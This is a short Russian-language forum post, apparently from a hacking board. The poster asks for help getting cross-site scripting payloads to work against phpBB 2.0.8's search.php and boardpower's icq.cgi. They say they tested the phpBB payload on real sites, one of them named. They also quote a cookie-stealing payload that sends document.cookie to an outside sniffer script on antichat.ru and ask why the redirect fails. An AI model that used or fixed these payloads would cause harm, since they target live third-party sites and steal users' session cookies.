В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script>alert(document.cookie)</script>[/QUOTE]<span id='postcolor'> проверал на саитах но не на одново неработает, например: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script>alert('kkl'</script>[/QUOTE]<span id='postcolor'> помогите, что делаю нетак?
Вот нашел boardpower баг работаюший если так </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script>javascript:alert(document.cookie);</script>[/QUOTE]<span id='postcolor'> показивает как надо, но если так </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'> то неработает. почему window.location неработает?
